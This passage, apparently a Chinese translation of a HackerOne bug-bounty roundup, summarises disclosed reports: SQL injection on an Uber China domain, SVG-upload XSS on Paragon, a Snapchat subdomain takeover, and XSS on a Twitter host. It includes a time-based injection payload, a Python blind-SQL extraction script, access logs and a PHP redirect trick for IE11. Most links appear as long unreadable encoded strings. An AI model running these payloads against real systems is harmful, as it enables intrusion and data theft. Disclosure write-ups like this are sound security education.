3.使用新的密码在c5cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0A6k6r3g2J5M7#2)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4c8e0N6Q4z5e0W2Q4b7V1u0Q4c8e0g2Q4b7V1c8Q4z5e0g2Q4c8e0k6Q4z5o6S2Q4z5e0k6Q4c8e0S2Q4z5o6m8Q4z5o6g2Q4c8e0g2Q4z5o6g2Q4b7U0k6Q4c8e0c8Q4b7V1u0Q4z5e0k6Q4c8e0S2Q4b7f1g2Q4b7V1g2Q4c8e0g2Q4b7e0c8Q4z5o6N6Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
二、在这博客的一系列报告中,只有orange知道让旅行的收益最大化。在中国的这个案例中,当orange取消订阅的时候,发现Uber的.cn域名存在SQL Injection漏洞,这个漏洞报告赢得了$4,000美金。
Orange发现的漏洞如下:
当orange在中国旅游使用Uber的时候,有一次他收到一份Uber的广告,并且里面有一个退订链接,但是他发现退订的连接和原来的退订链接不同,
并且这个退订连接存在SQL Injection。
Paload如下:
1
ba0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8W2P5f1Z5I4j5K6u0h3P5g2R3J5L8r3E0u0K9X3!0Y4d9h3A6g2x3@1&6f1g2h3N6k6g2K6g2C8d9f1S2z5M7#2A6i4g2Y4N6w2c8p5g2&6d9#2b7H3P5p5W2A6N6$3N6u0L8V1A6D9h3e0u0h3M7r3c8E0g2Y4W2u0K9X3!0Y4d9h3@1&6P5g2W2i4y4h3&6K9g2f1u0@1k6g2M7I4K9r3q4i4N6$3W2X3f1g2)9K6c8q4)9K6c8l9`.`.
上面这个链接让数据库sleep了12秒。p参数后面是base64,解码如下:
1
8d5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8Q4y4@1t1`."user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
然后orange写了一个盲注脚本得到数据库名字和数据库用户:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import json
import string
import requests
from urllib import quote
from base64 import b64encode
base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}
for l in range(0, 30):
for i in 'i'+base:
payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i)
new_payload = json.dumps(payload)
new_payload = b64encode(new_payload)
r = requests.get('b7aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8Q4x3U0N6Q4x3V1u0I4N6h3!0@1k6g2)9J5z5r3&6W2N6#2)9#2k6Y4m8S2P5h3I4G2j5h3c8Q4x3U0W2Q4x3U0V1`.
if len(r.content)>0:
print i,
break
最终得到mysql的用户名 sendcloud_w@10.9.79.210,数据库sedncloud。
三、Paragonie_Scott是HackerOne里面比较出众的队伍,在分析这篇奇特的.svg报告的时候,提醒我们.svg的与众不同。与其他图片格式相比,巧妙的.svg代码构造可以执行。Adbullah收到了Paragon项目有史以来最丰厚的奖励,更不用说3500次页面访问。
漏洞如下:
前提:浏览器处理SVG文件的方式非常烂,如果你要处理用户上传的SVG文件,必须确保只允许用户使用的Content-Type为text/plain。
背景:
Adbullah在ubuntu设置airship的时候碰到点问题,所以他在Paragon上面测试了下。
如果你上传任何文件(HTML,SWF等)来触发XSS,最终Content-Type的值会变成"text/palin;charset=us-ascii"。对于图片来说也一样,但是如果上传的格式是SVG,但是里面的内容是JS,最终允许上传。
这样设置Content-Type,"Content-Type: images/svg+xml; charset=us-ascii",攻击就可以成功,并且存储到用户的账户。
d28K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9H3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4W2k6h3b7%4k6o6j5%4x3K6m8X3z5e0q4S2z5o6k6T1i4K6u0W2M7r3&6Y4
四、我们经常在黑客报告中看到这样的字眼"这个漏洞好像没什么。。。",真是太谦虚了。这个控制338K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6S2M7%4c8D9P5g2)9J5k6i4y4U0i4K6u0V1j5$3c8F1i4K6u0W2L8X3g2@1i4@1f1#2i4@1q4p5i4K6V1H3i4@1f1#2i4K6W2r3i4K6W2r3i4@1f1#2i4K6V1H3i4K6S2p5i4@1f1$3i4K6S2m8i4@1p5#2i4@1f1#2i4K6V1I4i4K6S2m8i4@1f1#2i4@1t1H3i4@1t1I4i4@1f1$3i4K6V1^5i4@1q4r3i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1$3i4@1p5H3i4@1t1%4i4@1f1#2i4@1u0o6i4K6R3H3i4@1f1#2i4@1p5%4i4K6S2n7i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1K6i4K6R3H3i4K6R3J5
Ebrietas从一个旧的DNS记录开始,最终获得了$3000奖金。非常感谢他的报告,避免了用户获取错误的信息。
漏洞如下:
我在一个cdn主机上面发了snapchat运行的一个测试实例,但是当这个主机取消的时候DNS记录仍然存在。所有我可以在上面重新创建一个Fastly实例来接管它。我已经通过Censys的记录确定这个snapchat所属。
最新发现这个主机仍然在被Snapchat使用。我在服务器上面发现了如下的日志:
1
2
3
4
5
6
7
8
9
10
11
12
13
root@localhost:~# cat /var/log/apache2/access.log | grep -v server-status | grep snapchat -i
23.235.39.33 - - [02/Aug/2016:18:28:25 +0000] "GET /bq/story_blob?story_id=fRaYutXlQBosonUmKavo1uA&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPad2,5; iOS 9.1; gzip)"
23.235.39.43 - - [02/Aug/2016:18:28:25 +0000] "GET /bq/story_blob?story_id=f3gHI7yhW-Q7TeACCzc2nKQ&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPad2,5; iOS 9.1; gzip)"
23.235.46.45 - - [03/Aug/2016:02:40:48 +0000] "GET /bq/story_blob?story_id=fKGG6u9zG4juOFT7-k0PNWw&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (Nexus 7; Android 5.1.1#1836172#22; gzip)"
23.235.46.23 - - [03/Aug/2016:02:40:49 +0000] "GET /bq/story_blob?story_id=fco3gXZkbBCyGc_Ym8UhK2g&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (Nexus 7; Android 5.1.1#1836172#22; gzip)"
43.249.75.20 - - [03/Aug/2016:12:39:03 +0000] "GET /discover/dsnaps?edition_id=4527366714425344&dsnap_id=5651565881327616&hash=66e61fa7787383c08a76a131e96915eec2d8b3019a3a96af66496003c9a9b1c1&publisher=Refinery29&quality=android_med9to16-android_med9to16 HTTP/1.1" 404 455 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
43.249.75.24 - - [03/Aug/2016:12:39:03 +0000] "GET /bq/story_blob?story_id=ftzqLQky4KJ_B6Jebus2Paw&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
43.249.75.22 - - [03/Aug/2016:12:39:03 +0000] "GET /bq/story_blob?story_id=fEXbJ2SDn3Os8m4aeXs-7Cg&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
23.235.46.21 - - [03/Aug/2016:14:46:18 +0000] "GET /bq/story_blob?story_id=fu8jKJ_5yF71_WEDi8eiMuQ&t=1&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone5,2; iOS 9.2; gzip)"
23.235.46.28 - - [03/Aug/2016:14:46:19 +0000] "GET /bq/story_blob?story_id=flWVBXvBXToy-vhsBdze11g&t=1&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone5,2; iOS 9.2; gzip)"
23.235.44.35 - - [04/Aug/2016:05:57:37 +0000] "GET /bq/story_blob?story_id=fuZO-2ouGdvbCSggKAWGTaw&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (SAMSUNG-SGH-I537; Android 5.0.1#I537UCUCOC7#21; gzip)"
23.235.44.46 - - [04/Aug/2016:05:57:37 +0000] "GET /bq/story_blob?story_id=fa3DTt_mL0MhekUS9ZXg49A&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (SAMSUNG-SGH-I537; Android 5.0.1#I537UCUCOC7#21; gzip)"
185.31.18.21 - - [04/Aug/2016:19:50:01 +0000] "GET /bq/story_blob?story_id=fDL270uTcFhyzlRENPVPXnQ&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone7,1; iOS 9.3.2; gzip)"
这样看起来我可以添加任何内容,不管是哪个app在使用。
五、埃及的secgeek向twitter反馈了这个漏洞:sms-be-vip.twitter.com上存在HTML注入并且可能有XSS漏洞。这个漏洞影响到了最新版的IE浏览器(IE 11),它会导致html标签注入和JavaScript执行。在HackerOne,我们尤其欣赏专业和求同存异,最终这个漏洞获得了$420奖金。
漏洞如下:
在sms-be-vip.twitter.cm的404页面好像存在XSS和HTML注入,因为他并没有对HTML标签进行编码,比如629K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6L8i4y4Q4x3X3c8T1k6g2)9J5k6s2k6A6M7q4)9J5k6i4c8%4K9i4c8@1k6i4u0Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0k6D9N6q4)9K6b7X3R3I4i4K6t1$3k6%4c8Q4x3@1u0f1c8g2y4f1i4K6t1$3L8s2c8Q4x3@1u0Q4x3V1k6Z5x3g2)9J5y4X3N6@1i4K6y4n7i4@1f1K6i4K6R3H3i4K6R3J5
要触发这个漏洞,必须要确定URL不会编码之后发送,但是一般浏览器都会对URL进行编码。然而在最新的IE11或者更低版本的IE浏览器里面,这是可以做到的。
如何在使IE11在发送的时候不对URL进行编码处理呢?
在302跳转的时候IE不会对URL进行编码,所以我们可以写一个中转脚本:
1
2
3
4
<?php
$url = $_GET['x'];
header("Location: $url");
?>
然后使用如上的脚本对存在XSS的地方发起请求。
1
56fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3N6W2k6h3E0Q4x3X3g2F1k6i4c8Q4x3V1k6b7e0@1y4Q4x3V1k6J5k6h3c8A6M7W2)9J5k6i4m8Z5M7q4)9K6c8Y4S2Q4x3@1c8Z5N6s2c8H3M7#2)9K6b7g2)9J5c8W2)9J5c8Y4y4E0M7#2)9J5k6r3u0W2i4K6u0V1N6X3W2H3i4K6u0W2N6s2N6A6N6s2c8W2M7W2)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4X3I4@1i4K6y4n7K9o6q4Q4x3U0k6Y4N6q4)9K6b7W2c8q4f1#2c8Q4x3U0k6D9N6q4)9K6b7W2)9J5c8X3R3I4i4K6t1$3k6%4c8Q4x3@1t1`.
现在你就会在IE浏览器里面看到HTTP的错误信息,而不是在错误页面看到<h1>TEST</h1>
微软的HTTP错误信息会在满足下面两个条件的时候出现:
1. HTTP的状态必须是[400, 403, 404, 405, 406, 408, 409, 410, 500, 501, 505]
2. HTTP的应答长度小于预定值,对于404来说这个数值是512字节。
所以我在后面添加更多的数据来避免上面的问题:
1
3b6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3N6W2k6h3E0Q4x3X3g2F1k6i4c8Q4x3V1k6b7e0@1y4Q4x3V1k6J5k6h3c8A6M7W2)9J5k6i4m8Z5M7q4)9K6c8Y4S2Q4x3@1c8Z5N6s2c8H3M7#2)9K6b7g2)9J5c8W2)9J5c8Y4y4E0M7#2)9J5k6r3u0W2N6X3W2H3i4K6u0W2N6s2N6A6N6s2c8W2M7W2)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4X3I4@1i4K6y4n7K9o6q4Q4x3U0k6Y4N6q4)9K6b7W2c8q4f1#2c8Q4x3U0k6D9N6q4)9K6b7W2)9J5c8X3R3I4i4K6t1$3k6%4c8Q4x3@1u0Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3f1`.
这个漏洞允许恶意攻击者插入HTML标签,执行JS,最终可能导致用户session泄露,发起CSRF攻击或者引入一个钓鱼网站。
如果你觉得某个漏洞具有引导性或者非常棒,可以在Hacktivity页面点赞 。
这个漏洞允许恶意攻击者插入HTML标签,执行JS,最终可能导致用户session泄露,发起CSRF攻击或者引入一个钓鱼网站。
后记
想在下一季中出现么?上传你的漏洞报告或邀请你的黑客团队,就像上面这些公司一样。就像我曾经读过的博客,每个团队都需要一个赏金项目。
Rejesh F. Krishnan
769K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9@1i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4U0k6o6k6S2x3U0p5#2j5h3c8X3z5o6g2X3j5e0b7#2i4K6u0W2K9Y4m8Y4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9H3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4V1x3h3k6U0z5e0j5^5x3h3b7#2x3U0l9$3y4K6M7#2i4K6u0W2K9Y4m8Y4
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:c86K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Z5j5h3y4C8k6i4u0G2L8X3g2Q4x3X3g2U0L8$3#2Q4x3V1k6T1L8r3!0Y4i4K6u0r3N6r3!0H3i4K6u0V1N6Y4g2D9L8X3g2J5j5h3u0A6L8r3W2@1P5g2)9J5k6s2u0W2M7r3!0J5N6s2y4Q4x3X3c8G2k6W2)9J5k6o6y4c8i4K6u0V1x3U0l9I4y4R3`.`.
赞赏
|
|
|---|---|
|
|
赞赏
雪币:
留言: